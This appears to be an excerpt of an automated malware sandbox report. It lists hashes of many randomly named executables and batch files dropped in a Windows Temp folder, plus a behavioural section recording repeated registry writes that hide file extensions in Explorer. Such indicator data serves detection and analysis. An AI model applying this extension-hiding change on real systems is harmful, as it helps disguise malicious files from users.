| SHA1 | 3107357c1ec3b1448ce29c5891e735ea6dfde13d |
| SHA256 | 57771c6f4add6b3100394584a6aba9361c2acf3839997919c648a1cf6bc2dab7 |
| SHA512 | 7e8727679270bc561a8ec6ad75beb610c0e36dfec409fd2ad714c1b5d3ea39124b3201bf3e96203f695fe38189f54724a1af4d0409ce835add9433935b71b7be |
C:\Users\Admin\AppData\Local\Temp\CMkm.exe
| MD5 | 040dc7dc677a8b170dfd1fd7f3b0acd6 |
| SHA1 | f262d6f941c886babe36c1e65c9f4e8301734b0e |
| SHA256 | 8cdaf4c949322dbdb2430bcf9984b30112322ee998fe9c32e805c1de81134c9b |
| SHA512 | d4797c0c19f61769bd0390fcfa70eee2aeb725422e8381cb7075d56ef279c7efbb52c016cc9a15cb0226efe793d04c045814a011ca8694e24bdf4d4796fe4b4c |
C:\Users\Admin\AppData\Local\Temp\PkUUsEMM.bat
| MD5 | 04cfb59a00bfa023ea8fe4908f4a8631 |
| SHA1 | 68817901659d7332894e53e6d1a46ed62085b1a7 |
| SHA256 | 655e58976e140e3daa93293e682c90d7748a2bea18d4dcfd13211167d8b78092 |
| SHA512 | 6b79836dae0c1cc41f12e805444004112c1e7fb73c939d43147d18b75cd44e65e7fd2f19cee4b8d8f99962f3782c22e21c1fad288faf9071073c721d5465ed9a |
C:\Users\Admin\AppData\Local\Temp\wEQk.exe
| MD5 | d9e61d812e61caf37f5ee74ae76384fe |
| SHA1 | 4a4ac8868d79f4e5bac4266f413eceb2e945893b |
| SHA256 | eccb266f3264b486e2ab08d489cc12ea848b24a7b69eaf67d50579be4771080a |
| SHA512 | 6625371a4962935894be2c7a38c14cc1b9e620ee2c178d8175ba47b5805dea5551249e646d0c185a96bf11eefe03c78331895cafeae690e859b278ef5753334d |
C:\Users\Admin\AppData\Local\Temp\gkUu.exe
| MD5 | 9e5df1d64742eaa15a78aefcd3e0e42d |
| SHA1 | 76aec5d086bd35a3b1dcc537451e6fed6b042ad9 |
| SHA256 | 1cc5fcfcc44e48899b3c5f364349b2e9ce7f3a39f557e9d2129fa63f066720ed |
| SHA512 | f30d3ad81ef2f576d4d6d9a8ee6871eee51151df1f74ed4c0dc046dec5869fde6785dfa4ce5ff751bd11e114d4bc3a9afa6046e10f5a4a231560e870c226798d |
C:\Users\Admin\AppData\Local\Temp\ugoUkgUo.bat
| MD5 | 5bac55b639ba5e13d214b1a6461c12ef |
| SHA1 | faa21f075cc2ba67aa76f477ab99a18d18ca082c |
| SHA256 | 7e093e9b5e3e65a54ec0d3991b04129b9eddb08fd00655b720304d05dfad91f9 |
| SHA512 | cc147dc51bf710a8b6cec77a13c02049fad9985dd77adee80b47217e66ac477743287ee9fe917e3beab50b6e60dfd9a2ed3cd83110eb476b7199220cac53687d |
C:\Users\Admin\AppData\Local\Temp\gMsC.exe
| MD5 | a2aa6a3f9ddb07fbe0b9c7c6add84fa7 |
| SHA1 | a5a25021cadeb964bcbc579afe9a32e794574d21 |
| SHA256 | 372d608144596292996fccfa8c0ce0b2f211195d889d0ca4c402638bf12e4229 |
| SHA512 | 065a0fe03b03d5878959855a6b6b8aca05f7c74d3e8db3305c746721731ebfc70b80b3b55e2f6f823ea56db26ba8d5e0b99edd40cd31c0a93db34f4cf4e15369 |
C:\Users\Admin\AppData\Local\Temp\EEgI.exe
| MD5 | 5e154e5b91abacf2d10ef758f07fa639 |
| SHA1 | 002294d520648d9a752e771ea3f568cf0f773d9c |
| SHA256 | 30aa721c8ddfa9f06dbe712570c5b036576ec877004a402f8fad2be34866c9d9 |
| SHA512 | 4e57d7612ee8433a2226d71fc9acfeac5316225de3cd7f984a0e34c7ca517f51ccfa77545e3d768515d73162867c27a386068687262e1de688128e200aababce |
C:\Users\Admin\AppData\Local\Temp\YaMwcYAo.bat
| MD5 | 2987ed2972daa4e167293cef615f3c35 |
| SHA1 | 33bfd022ef763eeb8702465f75cd9e371879ac45 |
| SHA256 | 15dc2e7f677a948c04eaabb5ff26077f04c0f416851b0e4ebda5035ef547ddbb |
| SHA512 | 6a06094c2d0bf22e15701d24bac41cd0350287231ab3719fc6c02554584f761c44915580194f0dcbbf42a2780fc57f30674bcc41621cc70c524958d2433f1ffb |
C:\Users\Admin\AppData\Local\Temp\CoEs.exe
| MD5 | 8601c8d492e8dcf9a69055cccd560ecb |
| SHA1 | 01b61e9beda5e2c5eb0b92a8f5aa49ae5de5c0b1 |
| SHA256 | 6dab85761c42909aa53b678a68d1310a1c60313376bbaa553bdaac560018f219 |
| SHA512 | eb8da65af603b0d783b14c18af7e1743a398eaa34166771c16d345f300e53a4c35cc1f541ad5591ec12688a8591d05b18af48ac07c31d9f2e70caef11193adc1 |
C:\Users\Admin\AppData\Local\Temp\EWsosskE.bat
| MD5 | 56213f6c301eaaa40b0844f77fdabb34 |
| SHA1 | 9d2d835bda8c789a507e0907c7a6855f5853ddd6 |
| SHA256 | e3a9903071e1aae1bd6d93e2abf506164594724718ef2c92e3044e4cabab4b73 |
| SHA512 | 307b37eccec9a6db5c9bb9aa17e958e4c5f6be8653cedf6baee8d51be472a556854104c4a897035c2ab0642e58616f1fa5d808922f64e444fc9e98c34a2e0a02 |
C:\Users\Admin\AppData\Local\Temp\aQkE.ico
| MD5 | 6edd371bd7a23ec01c6a00d53f8723d1 |
| SHA1 | 7b649ce267a19686d2d07a6c3ee2ca852a549ee6 |
| SHA256 | 0b945cd858463198a2319799f721202efb88f1b7273bc3726206f0bb272802f7 |
| SHA512 | 65ccc2a9bdb09cac3293ea8ef68a2e63b30af122d1e4953ee5dc0db7250e56bcca0eb2b78809dbdedef0884fbac51416fc5b9420cb5d02d4d199573e25c1e1f8 |
C:\Users\Admin\AppData\Local\Temp\IcUS.exe
| MD5 | 3a88f5023f036b253b88dfc90493cf38 |
| SHA1 | be102f2902f906c7203f4fe1840724a443794d80 |
| SHA256 | 74bbef1c5ec4622990d448a8947c6327b88dadd0bfaae2373d1bb2f17f395fa3 |
| SHA512 | 0fd9d6689d75d17da3625708ea56d8da4cc145bd276c25d77e8595c0a7b80ce7f9f85133bd070277514f31fa7a9e664edf1f4c4045c0927cd15546c592c1a5c8 |
C:\Users\Admin\AppData\Local\Temp\IcUQYsgA.bat
| MD5 | 75f6ada0a6e8a419edf8edaee7d813e2 |
| SHA1 | 2ad70e579ce12d0e4f155d73d71477add2368dca |
| SHA256 | f7dea8afabf534d738ca193a4da16b9ac24d0b1bb5595ee9f49c8ed5d67a4782 |
| SHA512 | b48a7959b8c27516d6d5b7f71af2853335991d22f5f60f8416c6dfcf48bd6128da1a6ca0b83d046c1f6ee841a291b3f21276e04ae9239413b6421029c05eb646 |
C:\Users\Admin\AppData\Local\Temp\aIIO.exe
| MD5 | 7ef667779e40092aa575fede54db77a0 |
| SHA1 | 2e9f9ef4155519711d22ebb5704e3990e5f589ce |
| SHA256 | 48c81b6139a2147e7e5d0ac689bc1bb47d1654b99b9077e3902b067de77963a3 |
| SHA512 | f44841f281df85e6d6812e30af01fdaea2a9a1910d39c1062f0dc7064a29a7d6e5bd53a05d0159ff9a08798ef484bd475642d9d563759ce257c83d2e4f2b8ce0 |
memory/2472-3908-0x00000000772A0000-0x000000007739A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CgoA.exe
| MD5 | de8d4c51b2f746a3d2ab4a81aa1bb576 |
| SHA1 | eb9a5acd6db61ad34f62747702f9fcc02a62f0d5 |
| SHA256 | 2de177689ed61fe104bcd0c8a9bb76fe503cbbde2210569200e417d814c66d29 |
| SHA512 | af764b29de3feae7c480a07b6a3491a50213d976e57681d685e43e95bea6778cea440114e39defa00df2a31fb18364b774cba75735647965e29744f8fc58ab91 |
C:\Users\Admin\AppData\Local\Temp\UUUs.exe
| MD5 | 1344c876a065326f8a89e1621270064c |
| SHA1 | 082b6bafe72b22d64c0d7e8ad178683379cb8e68 |
| SHA256 | b31e5e9abbfe0a26591817d0f9ec0e1fffcbc927ca675a22b008c719518bb5cf |
| SHA512 | 6224a56280956d1720a3c93396df3a7a4f17862a0a61fd44168343c4ddad6cc3d23ea41c5dcf4f72b42e9cf2f4d24f9efbd746d6832132635d8b5913870c4712 |
C:\Users\Admin\AppData\Local\Temp\vsoEAgwA.bat
| MD5 | b273c6528c57a4ae06d730d29e9cd684 |
| SHA1 | f898b65f22f1d47dc19923c3031e1d190359adf0 |
| SHA256 | 2fb0e85710aa2938b5a736a28fa891017003d02067c177603e319fe06292558c |
| SHA512 | f8acef910e344562fffeeacd9feeb0adfcda4765c2344538403a30b25e02cfbae56cae00c62d480aa6345bf0d4b3d16212fb60f052c1c8aea7f922a30a7bd572 |
C:\Users\Admin\AppData\Local\Temp\uQcW.exe
| MD5 | f362ac63da1c3ab482340f7d79d4fae7 |
| SHA1 | e7e67d5aef570423e066e97f6698f5a7f91cb4a8 |
| SHA256 | 4532a5e3098af31c95ca9e914edcf0c1613f5b5ff3c5177573d758a0ff787bf0 |
| SHA512 | 1a4fee7b32a830ec16783296f48959b5f3e42e72ca256580a3f33e786633e8bf30a3d2a337e3ff8b01165b60725878cd3943fc724b16670c54929623df518946 |
C:\Users\Admin\AppData\Local\Temp\dAcMgIwE.bat
| MD5 | ee10b58a9839628aef13ded3ef5505e8 |
| SHA1 | c05b07349267f2f0df6d8df01e969f49a531c154 |
| SHA256 | ac724dfbfe787312c883782430fcf009e7f0f60442dac3bf11fcc3f679bc1ba8 |
| SHA512 | 304bb1d3331b70988a662b77f71c661e8a8af77fdc155d296d9a7476af399b126bf603e7c5914dda4e56d2d50e9645627160da3c2dd07c81f7565cf6bbe8f954 |
C:\Users\Admin\AppData\Local\Temp\YAYq.exe
| MD5 | b2bbd04ff3d92dd9c839f58375f69881 |
| SHA1 | 3f8805e6ae2841bc7314295166e16fb7f450276a |
| SHA256 | 84ad4d88c105cf32feac4d6b2f7d9729fe43410ef6d084c6d6343b4dd3a41fae |
| SHA512 | 87207c4d9a47c8c3e68f7653b28f111746081210ca20570622c8a17d1f58a3065542d6b425819cc6268017e154d6348aaf46d3c414ab98315346fb0a4dc37ad4 |
C:\Users\Admin\AppData\Local\Temp\SMIe.exe
| MD5 | 7a945dbb1d0143f31c1384b155f0c379 |
| SHA1 | 67093aae65f640a4d8a78a52c5b6f64d90013fa2 |
| SHA256 | e74ddd3fb1b229ae9900bd428fcbdc86539ebbb25ac852c24f126fe0f6fa373e |
| SHA512 | e5445eee8b9c15a25ca1494c9aa0b83f0593f5aff2b8eac3ea9d8c2a82e83a11a372e299e061bcb273340a5ed5793dfa0224814f4d1849e12d874bb85f1c7604 |
C:\Users\Admin\AppData\Local\Temp\AcEs.exe
| MD5 | 19371f05cf772d7b2e700ebf1a96faf4 |
| SHA1 | 21539d791e3b8db8a48ee61d949acc7610993f0b |
| SHA256 | ef59c8aed75c2c9cee779e437d01264bd141b98b286327617a126ec118fef0a5 |
| SHA512 | a5ac518031b5cb192cd166037dedea0bead663907e9a377f1dfc8fdf6aca976391a3984fc6db30778f37a98f9fc7ebe32f6fc8ed96c059f285a78e16194f52cf |
C:\Users\Admin\AppData\Local\Temp\QEQa.exe
| MD5 | a012bbd363155ad0d86b0d2238aceb3b |
| SHA1 | 023f82ec8589f53df62042e1a5ef7d993d8a3cda |
| SHA256 | 22eb70f3c9500ce5ac50751305dc6a89af4d64f8550b88c5932aed9338d6a750 |
| SHA512 | 8c9ca7dce5a2e1ba756befc178acc34ce37158d0cfab481341f938fa9a9c46f43bff484ac26b60922e5bd5a797a3b4864f50806a9d3f6502f1962036504d5bc8 |
memory/2472-3907-0x0000000077180000-0x000000007729F000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\NCQQAYgY.bat
| MD5 | 7b1e51d20189411ef71b6f9b7ada7e36 |
| SHA1 | adfafe26ca500f727a9da2a9889ee626f1a2cf11 |
| SHA256 | f55f92f07c04cd4ab8f10423bcf988613e8d5525e2953a44c96c24f749271ef5 |
| SHA512 | dded4f1d3aaa61d94b5e4e16d616447cf36d8c40dd7a55dfc70ae75588da3d019ae3f50f19d809e284353f5e6887538559321aff1314f04f4780ad6217416d9a |
C:\Users\Admin\AppData\Local\Temp\YksS.exe
| MD5 | 2b96edd02d99da986e1cf37944cb5599 |
| SHA1 | d95f6ab016326dbf8107da2eba94d47ee663ebd2 |
| SHA256 | 1312e4b39bf0b427de9e49375936207f2e5d833f5f38782ff7719b2c60f89f9f |
| SHA512 | 7252a7083bbe90db25b7f0cd73926b51237ad635f86e0cbbc7b5e0f1c81a206ce33da2f0f3255624683d1ceb0f058283c2c7d4edd8903a11f6668b5275046f7e |
C:\Users\Admin\AppData\Local\Temp\iUMi.exe
| MD5 | c37d0f8cae6eed525618a4a8e3061f36 |
| SHA1 | aca3fa9010dd6fc2f3b9b82133e7bf6c18a251d3 |
| SHA256 | fd139ebfe37d017d1787c5dc0c8b6d8d15d5526fe3af2d4dcdf2ed0d5d72031f |
| SHA512 | 41c2870c1ba491914427f56bcdade6c91818833f04c9d9327078170337a095ddd0f0f44a238a07f4c614b9910173c95260f710badaa6aa61aade114b6dc705c2 |
C:\Users\Admin\AppData\Local\Temp\gIEEwUcg.bat
| MD5 | 3dde7dbb475dba57dd710a3e594d3693 |
| SHA1 | 720a21d5f243435f42c399e0bf9d3c4550d8be00 |
| SHA256 | ea50afe6a968b7422e3b29192c6ed435db15e895b148cbfb0c3df84bca4c807a |
| SHA512 | 2656d1106b8cc97db051dc95a35dd7f640a6c89aa5bc13b7dce471d0d943c27a29ccf4f213a3c1e6780775ae7fb5bbd2f85d2af774a04cd6087d0ce4606305d7 |
C:\Users\Admin\AppData\Local\Temp\cCMYkEwA.bat
| MD5 | 28e7be9c24debb46b23c998e3a50fc48 |
| SHA1 | a3e563bd129a7b74e571af2d90ec64d66fe8fbbc |
| SHA256 | 5a582ee4024fc815126aa7b45d0d91370c27b3041fef7d5bdadf6808b8738883 |
| SHA512 | 6db5aa25563b1e31140e3dc542e1e323c74a72179475aafc8deece58c1f0b6e36f5c62e7206a17ac57bea3f9bd410e88dac4ac9f81215631d39ebe2425e7c4b8 |
C:\Users\Admin\AppData\Local\Temp\gcIAoUMA.bat
| MD5 | 32eb588228f196c28a2cdb2f2dbbd8a6 |
| SHA1 | 6b50299053a5f21fdf1a13b0a6e07fa60f846ac9 |
| SHA256 | 0134777178d638e8d40a2bfc7370aefa12f6776c2404bf2866ce6a409c5838c7 |
| SHA512 | a269841d6a57ba1aead36b6ab518b70e529e82e08be166f623628b6ac02351a3ae9cdfcd917f57022425b2246a0bceaceb5c1cedcc63ce0d10b5262319be561e |
C:\Users\Admin\AppData\Local\Temp\KygosgUU.bat
| MD5 | 3163477472ec725d0f0d7e3b37d002e4 |
| SHA1 | 7596abf25a0a27a6b98a7c6e0568ede38d951358 |
| SHA256 | 0841facd911e0df5e0451b54920cea1e2199efa9ac309f6d1deb3a91ce1c3408 |
| SHA512 | 1c9a6a00cc69894e03a87a0e3b96a8def106891915058cb4e57841496a93be45f647b861b70fb1dc1f9ae8ea4787affa006e7460b4d4865586616a383309aad7 |
C:\Users\Admin\AppData\Local\Temp\KeIEEoMk.bat
| MD5 | 24cb237b84a9c5f53faa99c5bde562fb |
| SHA1 | 319134cad3c7d9585c401c51f40161835aa46674 |
| SHA256 | 0967b4dffa9b3a25644626f47d6340f0c344d8845542d3596107b18e0f4c4ae7 |
| SHA512 | c33e3eeb441e5fa2e7c7fe2f0f520f81fe24c6b3488bd49c47dc8d9eff39c8b92637e76794619f152e761b77977f410a85af186de6326937e9d183f7d88d25c2 |
C:\Users\Admin\AppData\Local\Temp\jeogkIEA.bat
| MD5 | f47a58886feadf08cb5cc2118a7cf881 |
| SHA1 | 80f1230adc091f777e86dd57317dc6543d2292f7 |
| SHA256 | 74e03a7a26353066a927bfd62db182cc1c8a51eee01bb9e3be47592108b441f2 |
| SHA512 | 3149947b25cecee1b3e60c7c2b20e7ae7fa148075309b52932c475e504c44791776abf351474230c5f2402cc6a321427fae04ce684ea0c21263e22f0f6100d63 |
C:\Users\Admin\AppData\Local\Temp\TCoMgQMs.bat
| MD5 | f0edf5a8fa51a5e9289f40bbf0ef5a4c |
| SHA1 | ae880629fa7e73a469eab85e9b075bcd57906158 |
| SHA256 | 90dd2c45830bd3d03c60fbf1910c858eddacfab779885ae0ca6dbf5a7800fa7e |
| SHA512 | 80cea914a4a1bd91ce076583a03c1db8bf08ff2997cb87e0b0bee66ea58694a0e847c3d9aa79f12b9b3c6c30c4e56842e80c358fbd03eb1c7595d02e2040e9e5 |
C:\Users\Admin\AppData\Local\Temp\jIsEIwYU.bat
| MD5 | d2bf600d2a4d963b22eae491294dd1bb |
| SHA1 | d3a7391ab058eeb813247c0b6e9c1586f5fa2204 |
| SHA256 | d292b1768eedd8367a8112f42e5c4e275e8e3e7797fec7bcf3e428df0ce9e191 |
| SHA512 | 42f5d345cf22721a1d6b73cf22c6e014dbbef82096de1024aa6c453600c54bad10f3019a643c1bf59d61ce657bc2196e1934d7ea1871480cbe09cfa0a171bc56 |
C:\Users\Admin\AppData\Local\Temp\vykYUYQk.bat
| MD5 | ece96e0b0a031293726c504cb3990a40 |
| SHA1 | 357d11fe634e2ea5e2ddca5d33dee4f5de0d8188 |
| SHA256 | b53402ad31d60f0c4d434bc178c16739b74492a890156e2959bddbf3ba4c952e |
| SHA512 | 107da89e31f7e4c405a6dd87514473fa41d4bedf3c67046492c2f9325ab67e424ff2f45c2552560cb49385255f7d80c6fe40502968d1ab9f60a809299ac7e108 |
C:\Users\Admin\AppData\Local\Temp\QuAUEwQc.bat
| MD5 | 533128a912f53d077fa38078fae63248 |
| SHA1 | 45a75e1f4884c72a245dc1c5287ed5fcb01de430 |
| SHA256 | 1a41a6e652e3fa96e9f01c733c26e62316b54a3348f7158767270aacac6a7730 |
| SHA512 | 5eec3a9999cea6988593c8f561d571a78e27ba0b99c63aeebbaf392f47fede56a8a0a920275b472886e6462c9a8c3174c686d03e1deb94dd24700c0a1e69acc9 |
C:\Users\Admin\AppData\Local\Temp\EIIEcIkQ.bat
| MD5 | 6255d36f83d091fcba88ab7cabc905a9 |
| SHA1 | 9655050062ebad57688d241868a33f7f70a189d8 |
| SHA256 | f73def85dd788c4618e2316c71096e6db03ae58dbc6c0e9c2a49058c1ce50b23 |
| SHA512 | e23ce8cbc9e86c5c7034e99cf656433b61b57a3ed6cae99dfa1cc778d115bd4e597c2497c8cbb9e42fb1c5df0ca0e50a5e064a3617af07cfc1434e3318d3a00a |
C:\Users\Admin\AppData\Local\Temp\kmAAgEYc.bat
| MD5 | 02614a1ad71441b253f5772084444223 |
| SHA1 | 8fc9ac5777ece233042431f9c7c6a6c2c880e8cb |
| SHA256 | 0b7ce75a4a5cad1305b7ec508e1dd6395a944021ff6458620a478ed823c959c5 |
| SHA512 | 4e4c077b9ba07457eff2e2dca9b553974361a466331025f38aa5201f3fb086859c57ff742e585cf87fc13ef2f3073073cbe148e0ae7f6048be958f1573975ddf |
C:\Users\Admin\AppData\Local\Temp\IawQgwII.bat
| MD5 | 673b15c6427ae3e6f454b01e45b9e4ee |
| SHA1 | 5bac5fdf91a749bb6d55f8686dcecce5bcb752c1 |
| SHA256 | b1364caa04d98ebb8fae89d2df0a1b3b9daf22ccc71095dfd631bc6597bf0bc1 |
| SHA512 | 89ad34005a6d169fc86a6a3112588bf22d74f8cc56377b2a4c7164d9c2e790ed10a8c9f8a39a3d3786e0ebc294f89bb11883ddeea082da5182278621323031f5 |
C:\Users\Admin\AppData\Local\Temp\TkUUgEAQ.bat
| MD5 | f6d46d20a85e41ef3c789567edc466b0 |
| SHA1 | 83265d49b4dd87e0edd24f330c425baa6c90cc96 |
| SHA256 | 319c64e87a154a63d1f79f2523f179f97c690f00fd1f52d2c164b3bcb3aae549 |
| SHA512 | 88d787bd70867e3522e55a2dbc2b447459f1aaed90e081917291aaaa5adc0da739774b79780e3404d09e0db67832f45dc818edd8ae29e1857dafbac2eabb0903 |
C:\Users\Admin\AppData\Local\Temp\dQIEokoQ.bat
| MD5 | 7d3c847a2941b349f5cbb1dab55bf02e |
| SHA1 | a0c6afb18039c964ec3ae0d45be13cdf2b1a4031 |
| SHA256 | 20f49b6de49fc94f5c2ff5e0be9c721d593e552cb88c29366cc455e337b02d8f |
| SHA512 | 0aefe604783371719d1adb320b5be8b897db16a2911e7e7c253590cdca768e92db697737b445fe558f98524bae1683ad78547cca0b461effe47a9423b8f51f85 |
C:\Users\Admin\AppData\Local\Temp\FQUQAsMQ.bat
| MD5 | 16fe5338df4e003c31b6607649a67909 |
| SHA1 | 409050f2ab57911455fc0dc583dd3eee187c23b4 |
| SHA256 | c0983f404a4b3a1113755684bdb12992e19665e437db72b2b4c301d257595438 |
| SHA512 | e7dff56cc9b47bc5452ee1c0cf49164c8c44331507beac296e1a3c2240b7863aea34c03443ccecc6064e049be370e0ad1bfb0c11a7de614a0a4628e17173a48d |
C:\Users\Admin\AppData\Local\Temp\hcQkQgYQ.bat
| MD5 | 3fd91e71a6f5461501f882399f0d4246 |
| SHA1 | 4577b8487eb4b5560ab391063184db2b341288af |
| SHA256 | cad3db5348a5edb95fd553a77ace21d046f134e6d1e6be47892a80d056797d41 |
| SHA512 | a8d6acf49c88c74f818520a51ebfecb493e8ed78eabcc776534974b13767600fd5e24f89c44e800978b27d19df4bf004e5b35d9c11f613c1a8bb3470a1b168e7 |
C:\Users\Admin\AppData\Local\Temp\jYcEIUYQ.bat
| MD5 | a34f4bde3324e911f363f4d04e2d3d33 |
| SHA1 | c36f800a2516b8c72b5e28ea43a66db595c27691 |
| SHA256 | d832927be29ef4a0e72ead53a072768c876ffbfe97efe64344044f6f0d00f73e |
| SHA512 | 5cca2323231753df8188db19a5f7d73b680e398745bfe618e9bc43c8824952ceb8e43525a7fdc92cef525e1ceee307c41262e1a6cc7117fe19f1ae5be140d351 |
C:\Users\Admin\AppData\Local\Temp\qoAoggUs.bat
| MD5 | 0f4778651a377a59f7adbc2bdf8d9a1d |
| SHA1 | 525cd78053fb4a615b6518231216d73e951c6249 |
| SHA256 | 6aab257b622175618222150c487c289da936206b4720a86ce87f691ce4ad3d14 |
| SHA512 | d17931adc8fa8bd09eb8548f771e064a2c2fab6b577f1a8117868e0b7614fe3da7b6ef799ea180adabf00a265d627effb32607995c6afef76d34c3f48c97af07 |
C:\Users\Admin\AppData\Local\Temp\MOsoUsEY.bat
| MD5 | b0dd93688b36979a13a10ac0f009279d |
| SHA1 | f3846552ca977f03d30b8329023f363c4682b1ab |
| SHA256 | 9eb84508f11aba615a29a252f8b967b0bcb0248e0450520194f779d840de7659 |
| SHA512 | 235cf3834f51f03178bed8354212b0243c6bad03306991909e2acf440c62ec29b6aef704d62b003b1781b8b46c58b64233c172ff8bcfdfa242fe916ec530de49 |
C:\Users\Admin\AppData\Local\Temp\yOAMAMkU.bat
| MD5 | 9cf4759b2091a7d519bc3a953843a928 |
| SHA1 | 16539526b731e89d0a3463e3ebde3d5dbf75e285 |
| SHA256 | d3e03194b780c6a7a60288285dea18e41d72ad4369eb00cec1f511831da85986 |
| SHA512 | 0112e9912e06432e9c798e8fd44da0c32deaf8e458b1905584ed9c99448ec8d91d777434065b4cac98b7b15857d30bdf728028f601ed1f824d5dd47bc9852f9a |
C:\Users\Admin\AppData\Local\Temp\eUwYoowM.bat
| MD5 | ee3c7d685f8c7fd8239e4d8913e8b49a |
| SHA1 | 992b864f6b03924a47d8a46c982dc2c0d61c3408 |
| SHA256 | bc857e729c00282c19ca6d3dc634a6c532ca35d81a62e20ca429f9374850dd16 |
| SHA512 | b9c8ca953c9e8b1076f3c4dda820b237fd7dd2a9fd1110a8b3979ec86d925fc536cbf92f0715487e9b3362b8b1890b6dfea0b3fb103a912a9c30d3dd785e3813 |
C:\Users\Admin\AppData\Local\Temp\VIIAMIoY.bat
| MD5 | c0e61e8b5b81ad650442467b62751b01 |
| SHA1 | 3ff529df558dc0aa37e4115a790500ac526ebbd2 |
| SHA256 | 155f65b627946fc26eecb2ce35733e2b9b84adf8ababfe02e529bc9667ff43d5 |
| SHA512 | fe97c0afb198d8a5150439bd8baf9bc0bcb7a1ae31512badaa3b09852cfca11f61e7d3ff2fa52e9236dc9df759361773af1e1e1105e2bf452d98372887a2e84e |
C:\Users\Admin\AppData\Local\Temp\JQgwYokQ.bat
| MD5 | 9f12a2c28003687f3a3e4be49b996269 |
| SHA1 | 051075b71eedddd18ccd3edbd874079522e75b88 |
| SHA256 | 7ed427968041dbb97e28b867ab39dd5f5873172fac6d61f34466e30f9f46e6a6 |
| SHA512 | 1bb334774142d8f35546635f757098211096022f660a897f6c5f13fe549e851f93135cdd7aab070f88f5149c927575383343deaf98894242c917f2e2789a78f5 |
C:\Users\Admin\AppData\Local\Temp\ByIMgYkw.bat
| MD5 | ce74df1a65999c051a8e5d565f72b349 |
| SHA1 | c2090f4c07384e0da077f18c73280ae4bf0b5237 |
| SHA256 | 18f561cb60208c929904b3d065692b401b16b9574db0702a8edf950098180416 |
| SHA512 | 736c3174bb7a87abca5e57e6556fd4d63c08da945aee35e9020f74a4435815383e92171ec2eb0df0ca8cc1c83824ab176f9eae4c010ff650d5246bbbe27260a5 |
C:\Users\Admin\AppData\Local\Temp\JmcYAEUU.bat
| MD5 | 7ddfe0c0669f230206fb44cee8107e4f |
| SHA1 | d7673d7c0f8290b4d1f2947dbb5c5caac071c293 |
| SHA256 | f2bad7b4f8206d89bc6ab097f723312f8ebcaea53542587d090b725d632483e5 |
| SHA512 | de06b505731456cb84dcb194f63c670ddae0ca4fbedf8859725ffc7f98a0fc0e93b59140ec7aa042b4b4ae24415d9a482f5f12ae3069e747ad379fe4e85ce061 |
C:\Users\Admin\AppData\Local\Temp\LokcIkQQ.bat
| MD5 | b92f86d0de62dd7d3c71798eed6dbd45 |
| SHA1 | eb32a48abc05f3183432edbd084b6c35be7acdc0 |
| SHA256 | f41247483a7c9cc4d7d229279dfb1b15500a0d6917603833db92223ff1b2d01c |
| SHA512 | 838e170ab7bca0a4924d0fe211c6d9db063a6f2906068a39402973e4b850062c2b8a577dbc6a6fcb85f78acfd98cae1dd24540b0d44a2b433235dea1317725f2 |
C:\Users\Admin\AppData\Local\Temp\SeMkgksg.bat
| MD5 | 23ebb2705a9bdca0462b54531cad48ae |
| SHA1 | 48719048a61ff119f05640591ac2c02d407facde |
| SHA256 | 5e1d4f8a0082b2fd1ed95b6b94d4b83e6694285ca84e808a0cfc5892b65351a1 |
| SHA512 | 4a123033843c2f5f61239690a5523aeb2c79e99bdea2f99bdf1c8ea5d4ba68bf534c81d7d62ab104fc1d5edfc0143c5f23498f97c8573e37392a9a11b4c6732f |
C:\Users\Admin\AppData\Local\Temp\YWsUMoow.bat
| MD5 | c3dec9d1f52b61eeaa92761cc28bc9eb |
| SHA1 | 82dcb476e83c6a335ce4bf865cbb083d66d9da82 |
| SHA256 | 1a8407ad3c87ab453812952a03f2338934b425160cf36a7051a63f334c2919de |
| SHA512 | 30451eddc6bc610603c4fd51abe1e60cb3b3e862d4dcf5d48cc77f3ed4ec83858e78642bbb40833f613e2e88c6319865ac7a15cc90a8207a287b513bb6c31267 |
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-26 00:45
Reported
2024-10-26 00:47
Platform
win10v2004-20241007-en
Max time kernel
120s
Max time network
111s
Command Line
Signatures
Modifies visibility of file extensions in Explorer
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | N/A | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt = "1" | C:\Windows\SysWOW64\reg.exe | N/A |
